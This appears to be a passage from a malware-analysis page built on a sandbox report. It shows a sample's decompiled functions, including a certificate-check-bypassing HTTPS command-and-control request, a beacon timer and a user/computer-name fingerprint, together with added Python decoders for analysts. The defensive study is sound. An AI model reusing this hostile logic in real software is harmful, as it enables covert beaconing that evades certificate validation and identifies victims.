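SIXTY_SECONDS_NEG = (0xDC3CBA00, 0xFFFFFFFF)  # used with *0x2bdd248 on error 0x10d2

HUNDRED_NS_PER_SECOND = 10_000_000


def dword_to_ascii(value: int) -> str:
    """Reinterpret a 32-bit immediate as the little-endian bytes it was loaded from."""
    raw = struct.pack("<I", value & 0xFFFFFFFF)
    return raw.rstrip(b"\x00").decode("ascii")


def decode_fragments(table: dict) -> dict:
    """Map every string address in the table to the ASCII its first dword spells."""
    return {addr: dword_to_ascii(imm) for addr, imm in table.items()}


def qword_from_dwords(low: int, high: int) -> int:
    """Rebuild the signed 64-bit value that two pushed dwords represent."""
    packed = struct.pack("<II", low & 0xFFFFFFFF, high & 0xFFFFFFFF)
    return struct.unpack("<q", packed)[0]


def allmul_due_time(count: int, unit: tuple) -> int:
    """Mirror _allmul(count, unit): the LARGE_INTEGER later handed to SetWaitableTimer."""
    return count * qword_from_dwords(*unit)


def due_time_to_seconds(due: int) -> float:
    """A negative due time is relative to 'now' in 100 ns units; return the delay in seconds."""
    if due >= 0:
        raise ValueError("absolute (positive) due time; this sample only uses relative ones")
    return -due / HUNDRED_NS_PER_SECOND


if __name__ == "__main__":
    for addr, text in decode_fragments(FORMAT_FRAGMENTS).items():
        print(f"{addr:#010x}  {text!r}")
    # Constructed multipliers: the report does not show the config dwords'
    # actual values, so 30 and 5 are illustrative only.
    first_wait = allmul_due_time(30, ONE_SECOND_NEG)
    retry_wait = allmul_due_time(5, SIXTY_SECONDS_NEG)
    print(f"first wait : {due_time_to_seconds(first_wait):.0f} s")
    print(f"retry wait : {due_time_to_seconds(retry_wait):.0f} s")
```

The two timer constants fall out directly: 0xFFFFFFFFFF676980 is -10,000,000 (one second in 100 ns units) and 0xFFFFFFFFDC3CBA00 is -600,000,000 (sixty seconds), so the config dword at 0x2bdd240 / 0x2bdd244 is a delay in seconds and the one at 0x2bdd248 a delay in minutes. Because SetWaitableTimer treats a negative due time as relative, the product is the sleep the loop performs before re-entering the request path; the same arithmetic lets you translate sandbox-observed waits back into the configuration values that produced them.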

                                APIs
                                • memset.NTDLL ref: 02BD7C52
                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 02BD7C5E
                                • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 02BD7C83
                                • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 02BD7C9F
                                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 02BD7CB8
                                • HeapFree.KERNEL32(00000000,00000000), ref: 02BD7D4E
                                • CloseHandle.KERNEL32(?), ref: 02BD7D5D
                                • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 02BD7D97
                                • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,02BD312C,?), ref: 02BD7DAD
                                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 02BD7DB8
                                  • Part of subcall function 02BD5319: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,05009368,00000000,?,74E5F710,00000000,74E5F730), ref: 02BD5368
                                  • Part of subcall function 02BD5319: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,050093A0,?,00000000,30314549,00000014,004F0053,0500935C), ref: 02BD5405
                                  • Part of subcall function 02BD5319: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,02BD7CCB), ref: 02BD5417
                                • GetLastError.KERNEL32 ref: 02BD7DCA
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
• Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp
• Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp
• Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp
• Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                • String ID: Ut
                                • API String ID: 3521023985-8415677
                                • Opcode ID: 5e3e999beb41eb3a64bdc8c382991552dd3e6db42d7dc859640dfcfd38f9aa3b
                                • Instruction ID: 2c4f02db696113050657d03f6643b279365c8fbe5a4f949ba6abda02a655bbbc
                                • Opcode Fuzzy Hash: 5e3e999beb41eb3a64bdc8c382991552dd3e6db42d7dc859640dfcfd38f9aa3b
                                • Instruction Fuzzy Hash: 8B515CB1C02229AFDB109F95DC44EEEFFB9EF49760F104A56F455E2190EB708650DBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                C-Code - Quality: 92%
                                			E02BDA85C(void* __eax, void* __ecx, long __esi, char* _a4) {
                                				void _v8;
                                				long _v12;
                                				void _v16;
                                				void* _t34;
                                				void* _t38;
                                				void* _t40;
                                				char* _t56;
                                				long _t57;
                                				void* _t58;
                                				intOrPtr _t59;
                                				long _t65;
                                
                                				_t65 = __esi;
                                				_t58 = __ecx;
				_v16 = 0xea60; // 60000 ms, applied below as the send and receive timeout
				__imp__( *(__esi + 4)); // lstrlen of the URL string at +4 (see APIs below); length is returned in __eax
                                				_v12 = __eax + __eax;
                                				_t56 = E02BD1525(__eax + __eax + 1);
                                				if(_t56 != 0) {
                                					if(InternetCanonicalizeUrlA( *(__esi + 4), _t56,  &_v12, 0) == 0) {
                                						E02BD8B22(_t56);
                                					} else {
                                						E02BD8B22( *(__esi + 4));
                                						 *(__esi + 4) = _t56;
                                					}
                                				}
				_t34 = InternetOpenA(_a4, 0, 0, 0, 0x10000000); // executed; _a4 is the user agent, 0x10000000 = INTERNET_FLAG_ASYNC
				 *(_t65 + 0x10) = _t34;
				if(_t34 == 0 || InternetSetStatusCallback(_t34, E02BDA7F1) == 0xffffffff) { // 0xffffffff = INTERNET_INVALID_STATUS_CALLBACK
                                					L15:
                                					return GetLastError();
                                				} else {
                                					ResetEvent( *(_t65 + 0x1c));
					_t38 = InternetConnectA( *(_t65 + 0x10),  *_t65, 0x1bb, 0, 0, 3, 0, _t65); // executed; host at +0, port 0x1bb = 443, dwService 3 = INTERNET_SERVICE_HTTP, context = _t65
                                					 *(_t65 + 0x14) = _t38;
					if(_t38 != 0 || GetLastError() == 0x3e5 && E02BD29C0( *(_t65 + 0x1c), _t58, 0xea60) == 0) { // 0x3e5 = ERROR_IO_PENDING: async connect, so wait on the event at +0x1c for up to 60 s
						_t59 =  *0x2bdd2a8; // 0x242a5a8
						_t15 = _t59 + 0x2bde743; // 0x544547 = "GET" (little-endian ASCII)
						_v8 = 0x84c03180;
						_t40 = HttpOpenRequestA( *(_t65 + 0x14), _t15,  *(_t65 + 4), 0, 0, 0, 0x84c03180, _t65); // executed; 0x84c03180 = RELOAD | NO_CACHE_WRITE | SECURE | KEEP_CONNECTION | IGNORE_CERT_DATE_INVALID | IGNORE_CERT_CN_INVALID | PRAGMA_NOCACHE | CACHE_ASYNC
                                						 *(_t65 + 0x18) = _t40;
                                						if(_t40 == 0) {
                                							goto L15;
                                						}
                                						_t57 = 4;
                                						_v12 = _t57;
						if(InternetQueryOptionA(_t40, 0x1f,  &_v8,  &_v12) != 0) { // 0x1f = INTERNET_OPTION_SECURITY_FLAGS
							_v8 = _v8 | 0x00000100; // SECURITY_FLAG_IGNORE_UNKNOWN_CA: accept a certificate chaining to an untrusted root
							InternetSetOptionA( *(_t65 + 0x18), 0x1f,  &_v8, _t57);
						}
						if(InternetSetOptionA( *(_t65 + 0x18), 6,  &_v16, _t57) == 0 || InternetSetOptionA( *(_t65 + 0x18), 5,  &_v16, _t57) == 0) { // 6 = INTERNET_OPTION_RECEIVE_TIMEOUT, 5 = INTERNET_OPTION_SEND_TIMEOUT, both 60000 ms
                                							goto L15;
                                						} else {
                                							return 0;
                                						}
                                					} else {
                                						goto L15;
                                					}
                                				}
                                			}

                                APIs
                                • lstrlen.KERNEL32(?,00000008,74E04D40), ref: 02BDA86E
                                  • Part of subcall function 02BD1525: RtlAllocateHeap.NTDLL(00000000,00000000,02BD1278), ref: 02BD1531
                                • InternetCanonicalizeUrlA.WININET(?,00000000,00000000,00000000), ref: 02BDA891
                                • InternetOpenA.WININET(00000000,00000000,00000000,00000000,10000000), ref: 02BDA8B9
                                • InternetSetStatusCallback.WININET(00000000,02BDA7F1), ref: 02BDA8D0
                                • ResetEvent.KERNEL32(?), ref: 02BDA8E2
                                • InternetConnectA.WININET(?,?,000001BB,00000000,00000000,00000003,00000000,?), ref: 02BDA8F8
                                • GetLastError.KERNEL32 ref: 02BDA905
                                • HttpOpenRequestA.WININET(?,00544547,?,00000000,00000000,00000000,84C03180,?), ref: 02BDA94B
                                • InternetQueryOptionA.WININET(00000000,0000001F,00000000,00000000), ref: 02BDA969
                                • InternetSetOptionA.WININET(?,0000001F,00000100,00000004), ref: 02BDA98A
                                • InternetSetOptionA.WININET(?,00000006,0000EA60,00000004), ref: 02BDA996
                                • InternetSetOptionA.WININET(?,00000005,0000EA60,00000004), ref: 02BDA9A6
                                • GetLastError.KERNEL32 ref: 02BDA9B0
                                  • Part of subcall function 02BD8B22: RtlFreeHeap.NTDLL(00000000,00000000,02BD131A,00000000,?,?,00000000), ref: 02BD8B2E
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
                                • Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp
                                • Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp
                                • Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp
                                • Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: Internet$Option$ErrorHeapLastOpen$AllocateCallbackCanonicalizeConnectEventFreeHttpQueryRequestResetStatuslstrlen
                                • String ID:
                                • API String ID: 2290446683-0
                                • Opcode ID: 5a0cfb5204651f40e281bfd2e80f1cf85efe3401b3baffda3dca37c0efadde7b
                                • Instruction ID: 85cb65e16d073fec1b7bdba35e9017470eb9d345d70c0b7d979e9e28f6900b8c
                                • Opcode Fuzzy Hash: 5a0cfb5204651f40e281bfd2e80f1cf85efe3401b3baffda3dca37c0efadde7b
                                • Instruction Fuzzy Hash: 98419C72940205BFDB319FA1CC88EEBBFBDEB89744B104969F642D2190F731A555CB20
                                Uniqueness
                                • Uniqueness Score: -1.00%
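The WinINet sequence in E02BDA85C is where the sample builds its HTTPS transport, and the raw immediates hide the part that matters for detection: which certificate checks the request turns off. The decoder below is an added example written for this page; it is not code from the sandbox report or from the sample. The named constants are the public wininet.h / winerror.h values, and the OBSERVED table holds the immediates copied from the decompilation above.

```python
"""Decode the WinINet immediates used by E02BDA85C.

Added example for this page (not code from the sandbox report or from the
sample).  Named constants are the public wininet.h / winerror.h values; the
OBSERVED table is copied from the decompilation above.
"""

# InternetOpenA / HttpOpenRequestA dwFlags bits (wininet.h)
INTERNET_FLAGS = {
    0x80000000: "INTERNET_FLAG_RELOAD",
    0x10000000: "INTERNET_FLAG_ASYNC",
    0x04000000: "INTERNET_FLAG_NO_CACHE_WRITE",
    0x00800000: "INTERNET_FLAG_SECURE",
    0x00400000: "INTERNET_FLAG_KEEP_CONNECTION",
    0x00200000: "INTERNET_FLAG_NO_AUTO_REDIRECT",
    0x00080000: "INTERNET_FLAG_NO_COOKIES",
    0x00040000: "INTERNET_FLAG_NO_AUTH",
    0x00002000: "INTERNET_FLAG_IGNORE_CERT_DATE_INVALID",
    0x00001000: "INTERNET_FLAG_IGNORE_CERT_CN_INVALID",
    0x00000200: "INTERNET_FLAG_NO_UI",
    0x00000100: "INTERNET_FLAG_PRAGMA_NOCACHE",
    0x00000080: "INTERNET_FLAG_CACHE_ASYNC",
}

# Bits of INTERNET_OPTION_SECURITY_FLAGS (option 0x1f)
SECURITY_FLAGS = {
    0x00002000: "SECURITY_FLAG_IGNORE_CERT_DATE_INVALID",
    0x00001000: "SECURITY_FLAG_IGNORE_CERT_CN_INVALID",
    0x00000200: "SECURITY_FLAG_IGNORE_WRONG_USAGE",
    0x00000100: "SECURITY_FLAG_IGNORE_UNKNOWN_CA",
    0x00000080: "SECURITY_FLAG_IGNORE_REVOCATION",
}

INTERNET_SERVICE = {1: "INTERNET_SERVICE_FTP", 2: "INTERNET_SERVICE_GOPHER", 3: "INTERNET_SERVICE_HTTP"}
INTERNET_OPTION = {5: "INTERNET_OPTION_SEND_TIMEOUT", 6: "INTERNET_OPTION_RECEIVE_TIMEOUT",
                   0x1F: "INTERNET_OPTION_SECURITY_FLAGS"}
ERROR_IO_PENDING = 0x3E5  # 997

# Every bit that lets the request proceed although the server certificate fails validation
CERT_CHECK_BYPASS = {
    "INTERNET_FLAG_IGNORE_CERT_CN_INVALID",
    "INTERNET_FLAG_IGNORE_CERT_DATE_INVALID",
    "SECURITY_FLAG_IGNORE_CERT_CN_INVALID",
    "SECURITY_FLAG_IGNORE_CERT_DATE_INVALID",
    "SECURITY_FLAG_IGNORE_UNKNOWN_CA",
    "SECURITY_FLAG_IGNORE_REVOCATION",
}

# Immediates copied from the decompilation of E02BDA85C
OBSERVED = {
    "InternetOpenA.dwFlags": 0x10000000,
    "InternetConnectA.nServerPort": 0x1BB,
    "InternetConnectA.dwService": 3,
    "GetLastError_after_connect": 0x3E5,
    "HttpOpenRequestA.lpszVerb": 0x544547,
    "HttpOpenRequestA.dwFlags": 0x84C03180,
    "SecurityFlags.or_in": 0x100,
    "Timeout.value": 0xEA60,
    "Timeout.options": (6, 5),
}


def decode_flags(value, table):
    """Split a bitmask into its named bits, highest bit first; leftover bits stay as hex."""
    names, rest = [], value
    for bit in sorted(table, reverse=True):
        if value & bit:
            names.append(table[bit])
            rest &= ~bit
    if rest:
        names.append(f"0x{rest:08x}")
    return names


def decode_verb(imm):
    """A 32-bit immediate the compiler built from a short string literal, read back
    as little-endian ASCII (0x544547 -> 'GET')."""
    return imm.to_bytes(4, "little").rstrip(b"\0").decode("ascii")


def summarize(obs=OBSERVED):
    """Turn the raw immediates into the facts an analyst wants from this function."""
    request_flags = decode_flags(obs["HttpOpenRequestA.dwFlags"], INTERNET_FLAGS)
    security_flags = decode_flags(obs["SecurityFlags.or_in"], SECURITY_FLAGS)
    return {
        "open_flags": decode_flags(obs["InternetOpenA.dwFlags"], INTERNET_FLAGS),
        "port": obs["InternetConnectA.nServerPort"],
        "service": INTERNET_SERVICE[obs["InternetConnectA.dwService"]],
        "async_connect": obs["GetLastError_after_connect"] == ERROR_IO_PENDING,
        "verb": decode_verb(obs["HttpOpenRequestA.lpszVerb"]),
        "request_flags": request_flags,
        "security_flags_added": security_flags,
        "timeouts": {INTERNET_OPTION[o]: obs["Timeout.value"] for o in obs["Timeout.options"]},
        "cert_checks_bypassed": sorted(CERT_CHECK_BYPASS & set(request_flags + security_flags)),
    }


if __name__ == "__main__":
    for key, val in summarize().items():
        print(f"{key}: {val}")
```

The `cert_checks_bypassed` entry is the detection-relevant result: with CN, date and unknown-CA validation all ignored, the sample will talk to a C2 host presenting any self-signed certificate, which is also what makes its TLS traffic easy to intercept in a lab. The same decoder works for any WinINet call site; only the OBSERVED table is specific to this function.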

                                Control-flow Graph

                                [Control-flow graph rendered as an image in the original report: nodes 2bdac95 to 2bdaecf with executed / not-executed colouring; API calls on the graph: RaiseException, LoadLibraryA, GetLastError, InterlockedExchange, FreeLibrary, LocalAlloc, GetProcAddress]
                                C-Code - Quality: 51%
                                			E02BDAC95(long _a4, long _a8) {
                                				signed int _v8;
                                				intOrPtr _v16;
                                				LONG* _v28;
                                				long _v40;
                                				long _v44;
                                				long _v48;
                                				CHAR* _v52;
                                				long _v56;
                                				CHAR* _v60;
                                				long _v64;
                                				signed int* _v68;
                                				char _v72;
                                				signed int _t76;
                                				signed int _t80;
                                				signed int _t81;
                                				intOrPtr* _t82;
                                				intOrPtr* _t83;
                                				intOrPtr* _t85;
                                				intOrPtr* _t90;
                                				intOrPtr* _t95;
                                				intOrPtr* _t98;
                                				struct HINSTANCE__* _t99;
                                				void* _t102;
                                				intOrPtr* _t104;
                                				void* _t115;
                                				long _t116;
                                				void _t125;
                                				void* _t131;
                                				signed short _t133;
                                				struct HINSTANCE__* _t138;
                                				signed int* _t139;
                                
                                				_t139 = _a4;
                                				_v28 = _t139[2] + 0x2bd0000;
                                				_t115 = _t139[3] + 0x2bd0000;
                                				_t131 = _t139[4] + 0x2bd0000;
                                				_v8 = _t139[7];
                                				_v60 = _t139[1] + 0x2bd0000;
                                				_v16 = _t139[5] + 0x2bd0000;
                                				_v64 = _a8;
				_v72 = 0x24; // DelayLoadInfo.cb = sizeof(DelayLoadInfo) on 32-bit: this function is the MSVC delay-load helper (__delayLoadHelper2), compiler runtime rather than sample-specific logic
                                				_v68 = _t139;
                                				_v56 = 0;
                                				asm("stosd");
                                				_v48 = 0;
                                				_v44 = 0;
                                				_v40 = 0;
                                				if(( *_t139 & 0x00000001) == 0) {
                                					_a8 =  &_v72;
					RaiseException(0xc06d0057, 0, 1,  &_a8); // VcppException(ERROR_SEVERITY_ERROR, ERROR_INVALID_PARAMETER): descriptor attribute bit not set
                                					return 0;
                                				}
                                				_t138 =  *_v28;
                                				_t76 = _a8 - _t115 >> 2 << 2;
                                				_t133 =  *(_t131 + _t76);
                                				_a4 = _t76;
                                				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
                                				_v56 = _t80;
                                				_t81 = _t133 + 0x2bd0002;
                                				if(_t80 == 0) {
                                					_t81 = _t133 & 0x0000ffff;
                                				}
                                				_v52 = _t81;
				_t82 =  *0x2bdd1a0; // 0x0: __pfnDliNotifyHook2, unset in this build
                                				_t116 = 0;
                                				if(_t82 == 0) {
                                					L6:
                                					if(_t138 != 0) {
                                						L18:
                                						_t83 =  *0x2bdd1a0; // 0x0
                                						_v48 = _t138;
                                						if(_t83 != 0) {
                                							_t116 =  *_t83(2,  &_v72);
                                						}
                                						if(_t116 != 0) {
                                							L32:
                                							 *_a8 = _t116;
                                							L33:
                                							_t85 =  *0x2bdd1a0; // 0x0
                                							if(_t85 != 0) {
                                								_v40 = _v40 & 0x00000000;
                                								_v48 = _t138;
                                								_v44 = _t116;
                                								 *_t85(5,  &_v72);
                                							}
                                							return _t116;
                                						} else {
                                							if(_t139[5] == _t116 || _t139[7] == _t116) {
                                								L27:
                                								_t116 = GetProcAddress(_t138, _v52);
                                								if(_t116 == 0) {
                                									_v40 = GetLastError();
									_t90 =  *0x2bdd19c; // 0x0: __pfnDliFailureHook2, unset in this build
                                									if(_t90 != 0) {
                                										_t116 =  *_t90(4,  &_v72);
                                									}
                                									if(_t116 == 0) {
                                										_a4 =  &_v72;
										RaiseException(0xc06d007f, _t116, 1,  &_a4); // VcppException(ERROR_SEVERITY_ERROR, ERROR_PROC_NOT_FOUND)
                                										_t116 = _v44;
                                									}
                                								}
                                								goto L32;
                                							} else {
                                								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) { // 0x4550 = "PE": bound-import check, the loaded module's TimeDateStamp (+8) and ImageBase (+0x34) must match the descriptor before the pre-bound address at _v16 is trusted
                                									_t116 =  *(_a4 + _v16);
                                									if(_t116 != 0) {
                                										goto L32;
                                									}
                                								}
                                								goto L27;
                                							}
                                						}
                                					}
                                					_t98 =  *0x2bdd1a0; // 0x0
                                					if(_t98 == 0) {
                                						L9:
                                						_t99 = LoadLibraryA(_v60); // executed
                                						_t138 = _t99;
                                						if(_t138 != 0) {
                                							L13:
							if(InterlockedExchange(_v28, _t138) == _t138) { // publish the handle; if another thread already stored the same module, drop this extra reference
								FreeLibrary(_t138);
                                							} else {
                                								if(_t139[6] != 0) {
                                									_t102 = LocalAlloc(0x40, 8);
                                									if(_t102 != 0) {
                                										 *(_t102 + 4) = _t139;
                                										_t125 =  *0x2bdd198; // 0x0
                                										 *_t102 = _t125;
                                										 *0x2bdd198 = _t102;
                                									}
                                								}
                                							}
                                							goto L18;
                                						}
                                						_v40 = GetLastError();
                                						_t104 =  *0x2bdd19c; // 0x0
                                						if(_t104 == 0) {
                                							L12:
                                							_a8 =  &_v72;
							RaiseException(0xc06d007e, 0, 1,  &_a8); // VcppException(ERROR_SEVERITY_ERROR, ERROR_MOD_NOT_FOUND)
                                							return _v44;
                                						}
                                						_t138 =  *_t104(3,  &_v72);
                                						if(_t138 != 0) {
                                							goto L13;
                                						}
                                						goto L12;
                                					}
                                					_t138 =  *_t98(1,  &_v72);
                                					if(_t138 != 0) {
                                						goto L13;
                                					}
                                					goto L9;
                                				}
                                				_t116 =  *_t82(0,  &_v72);
                                				if(_t116 != 0) {
                                					goto L33;
                                				}
                                				goto L6;
                                			}

                                APIs
                                • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 02BDAD0E
                                • LoadLibraryA.KERNEL32(?), ref: 02BDAD8B
                                • GetLastError.KERNEL32 ref: 02BDAD97
                                • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 02BDADCA
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
                                • Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp
                                • Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp
                                • Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp
                                • Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: ExceptionRaise$ErrorLastLibraryLoad
                                • String ID: $
                                • API String ID: 948315288-3993045852
                                • Opcode ID: fb8ea1ad492bdf0f6312831dafb8b6ae58f7ec156a8427d4011035a09cfba319
                                • Instruction ID: f2a746e1335dde0dfd858f1c1a197fe168ea5d73b5fb3c6f3b736a903908a1ea
                                • Opcode Fuzzy Hash: fb8ea1ad492bdf0f6312831dafb8b6ae58f7ec156a8427d4011035a09cfba319
                                • Instruction Fuzzy Hash: F7813A75A41205AFDB20CFA8D890BEEBBF5EF48344F248469E945E7240FB70E945CB50
                                Uniqueness
                                • Uniqueness Score: -1.00%
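E02BDAC95 is worth recognising quickly so that no time is spent reversing it: the three RaiseException codes, the six hook notification values and the 0x24 structure size together identify the MSVC delay-load helper. The check below is an added example written for this page, not code from the sandbox report or from the sample. The constants are the public winerror.h and delayimp.h values; the OBSERVED_* values are copied from the decompilation above.

```python
"""Decode the RaiseException codes and hook calls in E02BDAC95.

Added example for this page (not code from the sandbox report or from the
sample).  Constants are the public winerror.h / delayimp.h values; the
OBSERVED_* values are copied from the decompilation above.
"""

FACILITY_VISUALCPP = 0x6D   # facility used by VcppException() in delayimp.h
STATUS_SEVERITY_ERROR = 3   # top two bits of an NTSTATUS-style code

WIN32_ERRORS = {
    0x57: "ERROR_INVALID_PARAMETER",
    0x7E: "ERROR_MOD_NOT_FOUND",
    0x7F: "ERROR_PROC_NOT_FOUND",
}

# dliNotify values passed as first argument to the __pfnDli*Hook2 callbacks
DLI_NOTIFY = {
    0: "dliStartProcessing",
    1: "dliNotePreLoadLibrary",
    2: "dliNotePreGetProcAddress",
    3: "dliFailLoadLib",
    4: "dliFailGetProc",
    5: "dliNoteEndProcessing",
}

SIZEOF_DELAYLOADINFO_X86 = 0x24  # the cb field the 32-bit helper initialises


def decode_vcpp_exception(code):
    """Split an exception code into severity, facility and the Win32 error it wraps."""
    err = code & 0xFFFF
    return {
        "severity_error": (code >> 30) == STATUS_SEVERITY_ERROR,
        "facility_visualcpp": ((code >> 16) & 0x1FFF) == FACILITY_VISUALCPP,
        "win32_error": WIN32_ERRORS.get(err, f"0x{err:04x}"),
    }


def looks_like_delay_load_helper(exception_codes, hook_notifications, cb):
    """True when the observed constants match the MSVC delay-load helper
    (__delayLoadHelper2): Visual C++ facility exceptions covering both a missing
    module and a missing export, hook notifications drawn only from the dliNotify
    enum, and the DelayLoadInfo.cb value of a 32-bit build."""
    decoded = [decode_vcpp_exception(c) for c in exception_codes]
    return (
        all(d["severity_error"] and d["facility_visualcpp"] for d in decoded)
        and {"ERROR_MOD_NOT_FOUND", "ERROR_PROC_NOT_FOUND"} <= {d["win32_error"] for d in decoded}
        and set(hook_notifications) <= set(DLI_NOTIFY)
        and cb == SIZEOF_DELAYLOADINFO_X86
    )


# Values copied from the decompilation of E02BDAC95
OBSERVED_EXCEPTIONS = (0xC06D0057, 0xC06D007E, 0xC06D007F)
OBSERVED_HOOK_CALLS = (0, 1, 2, 3, 4, 5)
OBSERVED_CB = 0x24

if __name__ == "__main__":
    for code in OBSERVED_EXCEPTIONS:
        print(f"0x{code:08x}: {decode_vcpp_exception(code)}")
    print("delay-load helper:", looks_like_delay_load_helper(OBSERVED_EXCEPTIONS, OBSERVED_HOOK_CALLS, OBSERVED_CB))
```

The same facility decode separates these from the other common 0x6D-facility code, 0xE06D7363 (a C++ `throw`), which has the same severity and facility but no Win32 error in its low word.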

                                Control-flow Graph

                                [Control-flow graph rendered as an image in the original report: nodes 2bd7a2e to 2bd7b3a with executed / not-executed colouring; calls on the graph: 2bd4f97, GetUserNameW, RtlAllocateHeap, 2bd2c0d, GetComputerNameW]
                                C-Code - Quality: 96%
                                			E02BD7A2E(char __eax, void* __esi) {
                                				long _v8;
                                				char _v12;
                                				signed int _v16;
                                				signed int _v20;
                                				signed int _v28;
                                				long _t34;
                                				signed int _t39;
                                				long _t50;
                                				char _t59;
                                				intOrPtr _t61;
                                				void* _t62;
                                				void* _t64;
                                				char _t65;
                                				intOrPtr* _t67;
                                				void* _t68;
                                				void* _t69;
                                
                                				_t69 = __esi;
                                				_t65 = __eax;
                                				_v8 = 0;
                                				_v12 = __eax;
                                				if(__eax == 0) {
                                					_t59 =  *0x2bdd270; // 0xd448b889
                                					_v12 = _t59;
                                				}
                                				_t64 = _t69;
                                				E02BD4F97( &_v12, _t64);
                                				if(_t65 != 0) {
                                					 *_t69 =  *_t69 ^  *0x2bdd2a4 ^ 0x46d76429;
                                				} else {
					GetUserNameW(0,  &_v8); // executed; NULL buffer: first call only reports the required length in _v8
                                					_t50 = _v8;
                                					if(_t50 != 0) {
                                						_t62 = RtlAllocateHeap( *0x2bdd238, 0, _t50 + _t50);
                                						if(_t62 != 0) {
                                							if(GetUserNameW(_t62,  &_v8) != 0) {
                                								_t64 = _t62;
                                								 *_t69 =  *_t69 ^ E02BD2C0D(_v8 + _v8, _t64);
                                							}
                                							HeapFree( *0x2bdd238, 0, _t62);
                                						}
                                					}
                                				}
                                				_t61 = __imp__;
                                				_v8 = _v8 & 0x00000000;
                                				GetComputerNameW(0,  &_v8);
                                				_t34 = _v8;
                                				if(_t34 != 0) {
                                					_t68 = RtlAllocateHeap( *0x2bdd238, 0, _t34 + _t34);
                                					if(_t68 != 0) {
                                						if(GetComputerNameW(_t68,  &_v8) != 0) {
                                							_t64 = _t68;
                                							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E02BD2C0D(_v8 + _v8, _t64);
                                						}
                                						HeapFree( *0x2bdd238, 0, _t68);
                                					}
                                				}
				asm("cpuid"); // leaf 1 (eax = 1); the four result registers are saved to _v28.._v16. The constants in the stores below are the pre-cpuid register values propagated by the decompiler, not what is actually written
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *((intOrPtr*)(_t67 + 8)) = 0;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28; // edx ^ ecx ^ eax; ebx (_v24, which carries the initial APIC ID and varies per core) is left out
				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
                                				return _t39;
                                			}

                                APIs
                                • GetUserNameW.ADVAPI32(00000000,?), ref: 02BD7A65
                                • RtlAllocateHeap.NTDLL(00000000,?), ref: 02BD7A7C
                                • GetUserNameW.ADVAPI32(00000000,?), ref: 02BD7A89
                                • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,02BD30EE), ref: 02BD7AAA
                                • GetComputerNameW.KERNEL32(00000000,00000000), ref: 02BD7AD1
                                • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 02BD7AE5
                                • GetComputerNameW.KERNEL32(00000000,00000000), ref: 02BD7AF2
                                • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,02BD30EE), ref: 02BD7B10
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
                                • Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp
                                • Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp
                                • Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp
                                • Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: HeapName$AllocateComputerFreeUser
                                • String ID: Ut
                                • API String ID: 3239747167-8415677
                                • Opcode ID: ff9632fe5bd2189e5b4d79a2ba5ec570219680c8e8d0120c4263a6d2c676a793
                                • Instruction ID: 6be02d13c09186f24a1c267b929c74e2ed0e37b345838a270fa1b8a023987246
